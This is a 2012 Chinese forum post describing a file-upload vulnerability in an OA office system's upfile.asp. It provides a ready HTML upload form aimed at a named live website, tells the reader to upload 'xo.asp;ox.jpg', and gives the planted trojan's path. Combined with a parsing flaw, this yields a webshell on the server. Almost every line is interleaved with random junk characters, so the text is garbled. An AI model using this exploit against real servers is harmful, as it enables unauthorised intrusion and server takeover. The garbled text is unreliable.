全能OA办公系统 上传漏洞- w" g- m/ z5 L+ s
" p3 M9 ^! L, d% K1 w: W% y3 s
系统介绍:
/ M& r/ R5 ^0 `. C) P9 {: f. v
" j4 x" l" V* u% X( Z全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。' K0 l" f5 L5 L0 f9 t0 G
/ H P% b6 X; G3 j
主要功能:) d& `2 N# w% T6 A3 @
公司通告 9 f: m6 n- u$ C4 v
工作计划 $ s2 ?" z) E, v/ @. ]/ |
通讯助理
) v4 O" h W, z9 }! u E3 F客户资源 7 w+ B8 V/ w# P$ |, q9 Q
我的公文 6 u' C( u2 ]: }& |, x/ w, d& p
公文传阅
& G7 K' U7 m7 G公共资源
( h8 ]3 G0 o0 P; a4 J+ |+ o资源预约 & x% u4 z: C& X; y/ a s9 w
今日考勤 ) \5 |. ` j& r' K
个人计划
- B( I3 t" v; ?; z! m$ e* n1 G Q个人通讯录
, H( q4 T$ \, g9 c个人基本档案
" x, L F3 g% y" h# u: J6 {" p9 v8 Q未读邮件 . C5 B; @- b) u. `9 `
发邮件
9 I* r3 q `" ~# }' F1 [; |收件夹 2 a# O8 ~; J V- [, y
寄件夹
( w! h- ?: J$ ^- Z- u3 O' B& J) f网络硬盘 + e# g1 `; U# }3 }5 \: a7 ]& c. {: G
网络会议 4 c7 z0 ?0 V9 j/ s m# ^
网络调查
! g* _1 I/ p# r# P* l交流论坛: u2 X. i# j. v% o1 f) ]5 z
5 X7 S2 P' ~1 ]5 ~$ e l0 [' p4 T有兴趣测试的朋友可以下源码看看) e. {7 d. ]; i- {4 J
/ }5 r6 u$ ?- e, ]& M5 I, O ?源码下载:! G* v! R& [4 Q7 P1 b
4 z) Q9 |5 a% X' m0 k% `0 A2 Bhttp://www.mycodes.net/30/4750.htm
* D5 t& l, O: c; E
2 \5 K3 n `8 w {% A6 f, v漏洞介绍:
' j. A% h& \! k" I* L" O+ x* g# d5 i/ \: ]; g2 g
由upfile.asp上传文件漏洞引起
& q- Q% _ O @# v' {) C: Z, u! C1 Y1 w/ q; J
测试方法:
7 \0 J0 ?1 }$ F# s$ s! S/ Q1 B5 i+ z, Y& `9 p3 g
使用名小子上传http://www.itlynn.com/upfile.asp即可1 G* X S( K2 m) e' d) a' S/ m( Y
1 H, S+ q( i' U如果upfile.asp文件被删除不存在。
q( r ?0 V! h$ i( m, L
) y0 z, i3 D% S7 }/ s) E u 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。3 |6 @( x0 c U
6 e, D/ N# x6 q5 M$ k如果存在那么将如下代码保存为upfile.html。; Q2 S4 j' K: u1 Y8 r
, R/ S$ F8 k1 V然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。' T" {8 {* c. R& q# p% l
- @ |6 d, T, q9 l* L. P2 }
7 x" a" z( P7 b" p H
; H8 s3 N9 g3 u# v) `8 |# u01 <table border='0' align="center" cellpadding="5">
' Y f- p7 f6 J @+ z* | @* w/ O; O: A5 b( f
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 4 R& _2 u9 [4 T6 c* i
: U2 y) G# @ e( O) ]. T
03 <tr> - v6 m3 M; I% ]9 D' j! `
T- G. d# F; } R. f! w" J04 <td>报错:</td> / Q# q6 f. i- V* }
: i* i. P/ H4 g& x: H/ V' F05 <td><input type='radio' name='errnumber' value='0'> 9 k! y! m- z, `$ s
1 l. N1 D, | b0 G4 Z' [$ Y06 自动更名 1 Z6 b0 l7 P8 }+ ^# j F
- |( l& E" w; G* s. @& q07 <input type='radio' name='errnumber' value='1' checked>
0 G8 D' k" R" |1 O. Z. D
1 j9 u" @5 S4 B3 C08 报错方式
/ x- M! J( I# [9 [8 @
; g+ _) r h' g% J# }, W09 <input type='radio' name='errnumber' value='2'> " ~' ]7 ~, j1 H/ |9 B2 i! W+ N
3 S. X' T$ Z3 L: b( z
10 直接覆盖</td>
% s9 W% J# Y- o8 j9 k
7 z& f! D2 E; Z# x' l/ v11 </tr>
) z! d/ A$ t7 t6 S, X1 g- S+ R/ F& H- c% Z1 M' u; S! t
12 <tr> 3 P# v2 w: N7 O) j1 B
: S' n( n S: t13 <td>主题:</td> 0 o% k# [+ F: F; u- \1 W
" M( Z1 t3 k, p4 V$ K' K2 x, p14 <td><input type='text' name='filename' size='30'></td> & Z6 O9 }* S; l2 U
" j) T& f* N, P8 q# }/ h
15 </tr> * I$ I# \! @' \7 I& Y' A
4 n% f$ m9 y( t8 x* C2 j+ u16 <tr>
0 k9 e5 p( v( U/ I) f& j. W5 B4 _* z1 {7 D% F8 m9 _
17 <td>文件:</td>
6 {1 _, {" |) H! m. u( _- l- u% @: ?' @' @' k% h* j; U/ d
18 <td><input type="file"name="fruit"size="30"></td>
: z4 ^0 V9 V$ e$ K/ S
4 ?, w: X! z6 v: k19 </tr>
4 `9 o0 C* q7 I
$ Z6 W% A1 w" q) D% x7 X$ I20 <tr>
! P" w. F. B) m: N( ^5 Z1 `
4 ] A/ b; N: N2 Y' b21 <td valign='top'>简介:</td>
! B; g! u3 D9 A. h, @: C- n; M- g% ]" m, T6 {
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ( a, @& p4 T$ s' |! J/ \; s: T
5 T" o- C4 o. l9 v. U
23 </tr> 4 B6 E: j l% F: ^6 q G
8 O% ^5 @) s" J: O: w w24
, W1 w6 f$ F1 I; }3 j$ Y; Q0 M; z5 j: k% y4 I) G$ W
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
0 g- u5 G; X- @
0 G( l, n5 q0 f7 H8 ^3 E9 N- j3 \( I26 </tr> % ~0 \7 Z4 m( a# W5 u# m
/ B( }5 E6 ]. b
27 </form> Y, T9 u0 H& A6 [* x
! f1 _; l! Q, S
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
4 t. F1 n, D7 O6 \% G* |
9 j+ D7 H! N8 {. i. }8 j* ?
$ F# S) [( v' W( u# w# k
4 w6 o0 l7 x7 r; p上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg8 h" Q( _/ X, }& N/ f
; A* B3 C% J+ f& B# y3 p+ y+ C, Z
此漏洞需要配合解析漏洞利用。9 X, G+ ], q6 R! R
4 G0 `# x. p3 J% E
|
发表于 2012-11-21 13:45:12
收藏
支持
反对